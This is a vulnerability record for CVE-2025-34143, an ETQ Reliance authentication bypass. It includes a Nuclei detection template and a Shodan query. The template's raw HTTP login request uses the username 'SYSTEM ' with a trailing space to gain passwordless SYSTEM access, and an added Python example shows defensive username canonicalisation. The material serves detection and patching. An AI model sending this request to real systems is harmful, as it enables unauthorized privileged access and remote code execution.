ETQ Reliance Authentication Bypass via Trailing Space

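Vulnerability Information

Vulnerability name: ETQ Reliance Authentication Bypass via Trailing Space

Vulnerability ID:

  • CVE: CVE-2025-34143

Vulnerability type: Authorization bypass

Severity: Critical

Description: ETQ Reliance is an enterprise quality management software product, widely used in manufacturing and service industries to track and manage quality processes, compliance, and audits. On the CG (legacy) platform the software has an authentication bypass vulnerability that allows an attacker to log in as the privileged internal SYSTEM user by manipulating the username field. The SYSTEM account does not require a password, which means any network attacker who can reach the login page can obtain elevated access. Once authenticated, the attacker can achieve remote code execution by modifying Jython scripts within the application. The technical root cause is that the application fails to strictly validate the username input, so the authentication mechanism can be bypassed by, for example, appending a trailing space. The impact is extremely severe: the flaw not only lets unauthorized users obtain high-privilege access to the system, but can also be used for further attacks such as data leakage and service disruption. The vulnerability was fixed in version MP-4583 by introducing stricter validation logic that excludes internal accounts from public authentication workflows.

Vendor: ETQ

Product name: ETQ Reliance

Affected versions: versions before MP-4583

Search query: html:"ETQ Reliance"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/9bb1dad95dfd00bea8378195c1cd652a6bb3059c/http%2Fcves%2F2025%2FCVE-2025-34143.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details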


id: CVE-2025-34143

info:
  name: ETQ Reliance Authentication Bypass via Trailing Space
  author: slcyber,DhiyaneshDK
  severity: critical
  description: |
    An authentication bypass vulnerability exists in ETQ Reliance on the CG (legacy) platform. The application allowed login as the privileged internal SYSTEM user by manipulating the username field. The SYSTEM account does not require a password, enabling attackers with network access to the login page to obtain elevated access. Once authenticated, an attacker could achieve remote code execution by modifying Jython scripts within the application. This issue was resolved by introducing stricter validation logic to exclude internal accounts from public authentication workflows in version MP-4583.
  reference:
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  metadata:
    max-request: 1
    shodan-query: html:"ETQ Reliance"
  tags: etq-reliance,auth-bypass

variables:
  # The internal account name followed by one trailing space
  username: "SYSTEM "
  # Random 7-character lowercase value; the SYSTEM account does not require a password
  password: "{{to_lower(rand_text_alphanumeric(7))}}"

http:
  - raw:
      - |
        POST /reliance/resources/sessions HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    # Both matchers must hold: a JSON response whose body contains both words
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "statusCode"
          - "userId"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
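
The validation gap from the description, seen from the fixing side: the reserved-account check and the user lookup must work on the same canonical string. This is an added Python example, not ETQ's code and not part of the original template; `naive_is_internal`, `public_login_name`, `INTERNAL_ACCOUNTS`, the 64-character limit and the sample inputs are assumptions made for illustration. It generalises from the trailing space in the template's `username` value to other equivalent spellings (tab, no-break space, full-width letters).

```python
import unicodedata
from typing import Optional

# Assumption: canonical names of internal accounts barred from the public login form.
INTERNAL_ACCOUNTS = frozenset({"system"})


def canonical(raw: str) -> str:
    """Fold compatibility forms, surrounding whitespace and case into one spelling."""
    return unicodedata.normalize("NFKC", raw).strip().casefold()


def naive_is_internal(raw: str) -> bool:
    """Weak check (a model of the bug class, not ETQ code): exact match on raw input."""
    return raw == "SYSTEM"


def public_login_name(raw: object) -> Optional[str]:
    """Return the name to hand to the user lookup, or None to refuse the login."""
    if not isinstance(raw, str):
        return None
    name = canonical(raw)
    if not name or len(name) > 64:
        return None
    # Refuse control/format characters (NUL, zero-width space, ...) that strip() keeps.
    if any(unicodedata.category(ch).startswith("C") for ch in name):
        return None
    # Internal accounts are excluded from the public workflow after canonicalisation.
    if name in INTERNAL_ACCOUNTS:
        return None
    return name


# Constructed sample inputs: spellings that all denote the same internal account.
SAMPLES = ["SYSTEM", "SYSTEM ", " system", "System\t", "SYSTEM\u00a0", "\uff33YSTEM"]

if __name__ == "__main__":
    for s in SAMPLES + ["alice", " Alice "]:
        print(repr(s), "naive_internal =", naive_is_internal(s),
              "accepted_as =", public_login_name(s))
```

The value returned by `public_login_name` is what the account lookup should receive, so the check and the lookup cannot disagree about which account a string names.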



Author: lianccc
Published: July 23, 2025